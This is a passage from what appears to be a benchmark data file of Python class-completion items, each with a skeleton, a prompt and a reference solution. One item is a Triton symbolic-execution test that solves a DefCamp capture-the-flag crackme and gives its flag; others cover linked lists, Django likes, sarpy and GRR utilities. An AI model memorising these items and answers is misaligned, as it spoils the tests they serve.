self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\n return solution\n<|end_body_0|>\n\n<|body_start_1|>\n import lief\n binary = lief.parse(filename)\n phdrs = binary.segments\n for phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))\n<|end_body_1|>\n\n<|body_start_2|>\n binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\n self.load_binary(binary_file)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\n for index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\n solution = self.emulate(4196093)\n self.assertEqual(solution, 'Code_Talkers')\n<|end_body_2|>\n", "revision_id": "a61651ce331ac53ec09e1d8fef5eab744e98c9de", "skeleton": "<|skeleton|>\nclass DefCamp2015:\n \"\"\"Test for DefCamp2015 challenge.\"\"\"\n\n def emulate(self, pc):\n \"\"\"Emulate every opcode from pc. 
* Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\"\"\"\n <|body_0|>\n\n def load_binary(self, filename):\n \"\"\"Load in memory every opcode from an elf program.\"\"\"\n <|body_1|>\n\n def test_defcamp_2015(self):\n \"\"\"Load binary, self.Triton.setup environment and solve challenge with sym eval.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DefCamp2015:\n \"\"\"Test for DefCamp2015 challenge.\"\"\"\n\n def emulate(self, pc):\n \"\"\"Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\"\"\"\n astCtxt = self.Triton.getAstContext()\n while pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\n return solution\n\n def load_binary(self, filename):\n \"\"\"Load in memory every opcode from an elf program.\"\"\"\n import lief\n binary = lief.parse(filename)\n phdrs = binary.segments\n for phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))\n\n def test_defcamp_2015(self):\n \"\"\"Load binary, self.Triton.setup environment and solve challenge with sym eval.\"\"\"\n binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\n self.load_binary(binary_file)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\n for index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\n solution = self.emulate(4196093)\n self.assertEqual(solution, 'Code_Talkers')\n", "source": "the_stack_v2_python_sparse", "source_path": "src/testers/unittests/test_simulation.py", "source_repo": "JonathanSalwan/Triton", "split": "test", "star_events_count": 3163} {"blob_id": "7bcf23c8332392ed97bb3fec7180364952dc0d6f", "bodies": ["def del_element(node):\n \"\"\"\n A -> B -> C -> ...\n :param node: A\n :param val: B.val\n :return: A->C->..\n \"\"\"\n tmp_node = node.next.next\n del node.next\n node.next = tmp_node\n return node\nwhile head and head.val == val:\n head = head.next\nif not head:\n return head\nnode = head\nwhile node:\n if not node.next:\n break\n elif node.next.val == val:\n node = del_element(node)\n else:\n node = node.next\nreturn head", "dump_node = ListNode()\ndump_node.next = head\ntmp_node = dump_node\nwhile tmp_node.next:\n if tmp_node.next.val == val:\n tmp_node.next = tmp_node.next.next\n else:\n tmp_node = 
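In the `DefCamp2015` record above, `emulate` drives Triton's fetch/decode/process loop and, at the `cmp eax, 1` site, asks the solver for a model, then decodes it into the flag by sorting variable ids and concatenating `chr(value)`. That decode step, isolated here with a made-up model dict standing in for Triton's solver objects:

# var id -> solved byte value (fabricated for illustration)
model = {0: 67, 1: 111, 2: 100, 3: 101}
solution = ''.join(chr(v) for _, v in sorted(model.items()))
assert solution == 'Code'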
tmp_node.next\nreturn dump_node.next"], "bodies_text": "<|body_start_0|>\n def del_element(node):\n \"\"\"\n A -> B -> C -> ...\n :param node: A\n :param val: B.val\n :return: A->C->..\n \"\"\"\n tmp_node = node.next.next\n del node.next\n node.next = tmp_node\n return node\n while head and head.val == val:\n head = head.next\n if not head:\n return head\n node = head\n while node:\n if not node.next:\n break\n elif node.next.val == val:\n node = del_element(node)\n else:\n node = node.next\n return head\n<|end_body_0|>\n\n<|body_start_1|>\n dump_node = ListNode()\n dump_node.next = head\n tmp_node = dump_node\n while tmp_node.next:\n if tmp_node.next.val == val:\n tmp_node.next = tmp_node.next.next\n else:\n tmp_node = tmp_node.next\n return dump_node.next\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def removeElements(self, head: ListNode, val: int) -> ListNode:\n \"\"\"注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:\"\"\"\n <|body_0|>\n\n def removeElements2(self, head: ListNode, val: int) -> ListNode:\n \"\"\"listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def del_element(node):\n \"\"\"\n A -> B -> C -> ...\n :param node: A\n :param val: B.val\n :return: A->C->..\n \"\"\"\n tmp_node = node.next.next\n del node.next\n node.next = tmp_node\n return node\n while head and head.val == val:\n head = head.next\n if not head:\n return head\n node = head\n while node:\n if not node.next:\n break\n elif node.next.val == val:\n node = del_element(node)\n else:\n node = node.next\n return head\n<|end_body_0|>\n\n<|body_start_1|>\n dump_node = ListNode()\n dump_node.next = head\n tmp_node = dump_node\n while tmp_node.next:\n if tmp_node.next.val == val:\n tmp_node.next = tmp_node.next.next\n else:\n tmp_node = tmp_node.next\n return dump_node.next\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000231", "length_bytes": 2684, "license_type": "no_license", "methods": [{"docstring": "注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:", "name": "removeElements", "signature": "def removeElements(self, head: ListNode, val: int) -> ListNode"}, {"docstring": "listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:", "name": "removeElements2", "signature": "def removeElements2(self, head: ListNode, val: int) -> ListNode"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000328", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeElements(self, head: ListNode, val: int) -> ListNode: 注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:\n- def removeElements2(self, head: ListNode, val: int) -> ListNode: listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeElements(self, head: ListNode, val: int) -> ListNode: 注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:\n- def removeElements2(self, head: ListNode, val: int) -> ListNode: listnode加一个头结点! 
a->b->c 0->a->b->c :param head: :param val: :return:\n\n<|skeleton|>\nclass Solution:\n\n    def removeElements(self, head: ListNode, val: int) -> ListNode:\n        \"\"\"Note: 1. when head is empty 2. when all nodes are removed 3. the ListNode class has default values :param head: :param val: :return:\"\"\"\n        <|body_0|>\n\n    def removeElements2(self, head: ListNode, val: int) -> ListNode:\n        \"\"\"Add a dummy head node to the list! a->b->c 0->a->b->c :param head: :param val: :return:\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    def del_element(node):\n        \"\"\"\n        A -> B -> C -> ...\n        :param node: A\n        :param val: B.val\n        :return: A->C->..\n        \"\"\"\n        tmp_node = node.next.next\n        del node.next\n        node.next = tmp_node\n        return node\n    while head and head.val == val:\n        head = head.next\n    if not head:\n        return head\n    node = head\n    while node:\n        if not node.next:\n            break\n        elif node.next.val == val:\n            node = del_element(node)\n        else:\n            node = node.next\n    return head\n<|end_body_0|>\n\n<|body_start_1|>\n    dump_node = ListNode()\n    dump_node.next = head\n    tmp_node = dump_node\n    while tmp_node.next:\n        if tmp_node.next.val == val:\n            tmp_node.next = tmp_node.next.next\n        else:\n            tmp_node = tmp_node.next\n    return dump_node.next\n<|end_body_1|>\n", "revision_id": "b1680014ce3f55ba952a1e64241c0cbb783cc436", "skeleton": "<|skeleton|>\nclass Solution:\n\n    def removeElements(self, head: ListNode, val: int) -> ListNode:\n        \"\"\"Note: 1. when head is empty 2. when all nodes are removed 3. the ListNode class has default values :param head: :param val: :return:\"\"\"\n        <|body_0|>\n\n    def removeElements2(self, head: ListNode, val: int) -> ListNode:\n        \"\"\"Add a dummy head node to the list! a->b->c 0->a->b->c :param head: :param val: :return:\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n    def removeElements(self, head: ListNode, val: int) -> ListNode:\n        \"\"\"Note: 1. when head is empty 2. when all nodes are removed 3. the ListNode class has default values :param head: :param val: :return:\"\"\"\n        def del_element(node):\n            \"\"\"\n            A -> B -> C -> ...\n            :param node: A\n            :param val: B.val\n            :return: A->C->..\n            \"\"\"\n            tmp_node = node.next.next\n            del node.next\n            node.next = tmp_node\n            return node\n        while head and head.val == val:\n            head = head.next\n        if not head:\n            return head\n        node = head\n        while node:\n            if not node.next:\n                break\n            elif node.next.val == val:\n                node = del_element(node)\n            else:\n                node = node.next\n        return head\n\n    def removeElements2(self, head: ListNode, val: int) -> ListNode:\n        \"\"\"Add a dummy head node to the list! 
a->b->c 0->a->b->c :param head: :param val: :return:\"\"\"\n        dump_node = ListNode()\n        dump_node.next = head\n        tmp_node = dump_node\n        while tmp_node.next:\n            if tmp_node.next.val == val:\n                tmp_node.next = tmp_node.next.next\n            else:\n                tmp_node = tmp_node.next\n        return dump_node.next\n", "source": "the_stack_v2_python_sparse", "source_path": "a_203.py", "source_repo": "sun510001/leetcode_jianzhi_offer_2", "split": "test", "star_events_count": 0} {"blob_id": "7221e4aee4ad15d7c14502266429ba4009b13d74", "bodies": ["like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\nlike.save()\nreturn like", "try:\n    like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n    return like\nexcept CommentLike.DoesNotExist:\n    return None"], "bodies_text": "<|body_start_0|>\n    like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\n    like.save()\n    return like\n<|end_body_0|>\n\n<|body_start_1|>\n    try:\n        like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n        return like\n    except CommentLike.DoesNotExist:\n        return None\n<|end_body_1|>\n", "class_docstring": "", "class_name": "CommentLike", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CommentLike:\n\n    def add_comment_like(comment_id=0, user_id=0):\n        \"\"\"Add a like record\"\"\"\n        <|body_0|>\n\n    def user_liked(comment_id=0, user_id=0):\n        \"\"\"Query whether a user has liked the comment\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\n    like.save()\n    return like\n<|end_body_0|>\n\n<|body_start_1|>\n    try:\n        like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n        return like\n    except CommentLike.DoesNotExist:\n        return None\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000232", "length_bytes": 979, "license_type": "no_license", "methods": [{"docstring": "Add a like record", "name": "add_comment_like", "signature": "def add_comment_like(comment_id=0, user_id=0)"}, {"docstring": "Query whether a user has liked the comment", "name": "user_liked", "signature": "def user_liked(comment_id=0, user_id=0)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006397", "prompt": "Implement the Python class `CommentLike` described below.\n\nClass description:\nImplement the CommentLike class.\n\nMethod signatures and docstrings:\n- def add_comment_like(comment_id=0, user_id=0): Add a like record\n- def user_liked(comment_id=0, user_id=0): Query whether a user has liked the comment", "prompted_full_text": "Implement the Python class `CommentLike` described below.\n\nClass description:\nImplement the CommentLike class.\n\nMethod signatures and docstrings:\n- def add_comment_like(comment_id=0, user_id=0): Add a like record\n- def user_liked(comment_id=0, user_id=0): Query whether a user has liked the comment\n\n<|skeleton|>\nclass CommentLike:\n\n    def add_comment_like(comment_id=0, user_id=0):\n        \"\"\"Add a like record\"\"\"\n        <|body_0|>\n\n    def user_liked(comment_id=0, user_id=0):\n        \"\"\"Query whether a user has liked the comment\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\n    like.save()\n    return like\n<|end_body_0|>\n\n<|body_start_1|>\n    try:\n        like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n        return like\n    except CommentLike.DoesNotExist:\n        return None\n<|end_body_1|>\n", "revision_id": "1fa6ab22a04f3cd2c1a130803833c5c22460a382", "skeleton": "<|skeleton|>\nclass CommentLike:\n\n    def add_comment_like(comment_id=0, user_id=0):\n        \"\"\"Add a like record\"\"\"\n        
<|body_0|>\n\n    def user_liked(comment_id=0, user_id=0):\n        \"\"\"Query whether a user has liked the comment\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CommentLike:\n    def add_comment_like(comment_id=0, user_id=0):\n        \"\"\"Add a like record\"\"\"\n        like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\n        like.save()\n        return like\n\n    def user_liked(comment_id=0, user_id=0):\n        \"\"\"Query whether a user has liked the comment\"\"\"\n        try:\n            like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n            return like\n        except CommentLike.DoesNotExist:\n            return None\n", "source": "the_stack_v2_python_sparse", "source_path": "app/models/blog/comment_like.py", "source_repo": "tomszhou/pony", "split": "test", "star_events_count": 1} {"blob_id": "1155b519a9a3255c0864d4760cad13aafd5602c2", "bodies": ["if '_xml_ns' in kwargs:\n    self._xml_ns = kwargs['_xml_ns']\nif '_xml_ns_key' in kwargs:\n    self._xml_ns_key = kwargs['_xml_ns_key']\nself.index = index\nsuper(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)", "if array is None:\n    return None\nif isinstance(array, (numpy.ndarray, list, tuple)):\n    if len(array) < 2:\n        raise ValueError(_len2_array_text.format(array))\n    return cls(X=array[0], Y=array[1], index=index)\nraise ValueError(_array_type_text.format(type(array)))"], "bodies_text": "<|body_start_0|>\n    if '_xml_ns' in kwargs:\n        self._xml_ns = kwargs['_xml_ns']\n    if '_xml_ns_key' in kwargs:\n        self._xml_ns_key = kwargs['_xml_ns_key']\n    self.index = index\n    super(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n    if array is None:\n        return None\n    if isinstance(array, (numpy.ndarray, list, tuple)):\n        if len(array) < 2:\n            raise ValueError(_len2_array_text.format(array))\n        return cls(X=array[0], Y=array[1], index=index)\n    raise ValueError(_array_type_text.format(type(array)))\n<|end_body_1|>\n", "class_docstring": "An array element of XYType.", "class_name": "XYVertexType", "detected_licenses": ["MIT", "LicenseRef-scancode-free-unknown", "LicenseRef-scancode-public-domain"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass XYVertexType:\n    \"\"\"An array element of XYType.\"\"\"\n\n    def __init__(self, X=None, Y=None, index=None, **kwargs):\n        \"\"\"Parameters ---------- X : float Y : float index : int kwargs\"\"\"\n        <|body_0|>\n\n    def from_array(cls, array, index=1):\n        \"\"\"Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\"\"\"\n        <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    if '_xml_ns' in kwargs:\n        self._xml_ns = kwargs['_xml_ns']\n    if '_xml_ns_key' in kwargs:\n        self._xml_ns_key = kwargs['_xml_ns_key']\n    self.index = index\n    super(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n    if array is None:\n        return None\n    if isinstance(array, (numpy.ndarray, list, tuple)):\n        if len(array) < 2:\n            raise ValueError(_len2_array_text.format(array))\n        return cls(X=array[0], Y=array[1], index=index)\n    raise ValueError(_array_type_text.format(type(array)))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000233", "length_bytes": 10131, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- X : float Y : float index : int kwargs", "name": "__init__", "signature": "def __init__(self, X=None, Y=None, index=None, **kwargs)"}, {"docstring": "Create from an array type entry. 
Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType", "name": "from_array", "signature": "def from_array(cls, array, index=1)"}], "n_methods": 2, "prompt": "Implement the Python class `XYVertexType` described below.\n\nClass description:\nAn array element of XYType.\n\nMethod signatures and docstrings:\n- def __init__(self, X=None, Y=None, index=None, **kwargs): Parameters ---------- X : float Y : float index : int kwargs\n- def from_array(cls, array, index=1): Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType", "prompted_full_text": "Implement the Python class `XYVertexType` described below.\n\nClass description:\nAn array element of XYType.\n\nMethod signatures and docstrings:\n- def __init__(self, X=None, Y=None, index=None, **kwargs): Parameters ---------- X : float Y : float index : int kwargs\n- def from_array(cls, array, index=1): Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\n\n<|skeleton|>\nclass XYVertexType:\n \"\"\"An array element of XYType.\"\"\"\n\n def __init__(self, X=None, Y=None, index=None, **kwargs):\n \"\"\"Parameters ---------- X : float Y : float index : int kwargs\"\"\"\n <|body_0|>\n\n def from_array(cls, array, index=1):\n \"\"\"Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if '_xml_ns' in kwargs:\n self._xml_ns = kwargs['_xml_ns']\n if '_xml_ns_key' in kwargs:\n self._xml_ns_key = kwargs['_xml_ns_key']\n self.index = index\n super(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if array is None:\n return None\n if isinstance(array, (numpy.ndarray, list, tuple)):\n if len(array) < 2:\n raise ValueError(_len2_array_text.format(array))\n return cls(X=array[0], Y=array[1], index=index)\n raise ValueError(_array_type_text.format(type(array)))\n<|end_body_1|>\n", "revision_id": "de1b1886f161a83b6c89aadc7a2c7cfc4892ef81", "skeleton": "<|skeleton|>\nclass XYVertexType:\n \"\"\"An array element of XYType.\"\"\"\n\n def __init__(self, X=None, Y=None, index=None, **kwargs):\n \"\"\"Parameters ---------- X : float Y : float index : int kwargs\"\"\"\n <|body_0|>\n\n def from_array(cls, array, index=1):\n \"\"\"Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class XYVertexType:\n \"\"\"An array element of XYType.\"\"\"\n\n def __init__(self, X=None, Y=None, index=None, **kwargs):\n \"\"\"Parameters ---------- X : float Y : float index : int kwargs\"\"\"\n if '_xml_ns' in kwargs:\n self._xml_ns = kwargs['_xml_ns']\n if '_xml_ns_key' in kwargs:\n self._xml_ns_key = kwargs['_xml_ns_key']\n self.index = index\n super(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)\n\n def from_array(cls, array, index=1):\n \"\"\"Create from an array type entry. 
Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\"\"\"\n if array is None:\n return None\n if isinstance(array, (numpy.ndarray, list, tuple)):\n if len(array) < 2:\n raise ValueError(_len2_array_text.format(array))\n return cls(X=array[0], Y=array[1], index=index)\n raise ValueError(_array_type_text.format(type(array)))\n", "source": "the_stack_v2_python_sparse", "source_path": "sarpy/io/phase_history/cphd1_elements/blocks.py", "source_repo": "ngageoint/sarpy", "split": "test", "star_events_count": 192} {"blob_id": "32d62d93df88ed9350aba218d19f3a16dbf707c7", "bodies": ["proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone /sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\nwith contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)", "with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())"], "bodies_text": "<|body_start_0|>\n proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone /sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs 
rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\n with contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)\n<|end_body_0|>\n\n<|body_start_1|>\n with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())\n<|end_body_1|>\n", "class_docstring": "Test the linux client utils.", "class_name": "ClientUtilsLinuxTest", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ClientUtilsLinuxTest:\n \"\"\"Test the linux client utils.\"\"\"\n\n def testLinuxGetRawDevice(self):\n \"\"\"Test the parser for linux mounts.\"\"\"\n <|body_0|>\n\n def testLinuxTransactionLog(self):\n \"\"\"Tests the linux transaction log.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone /sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\n with contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, 
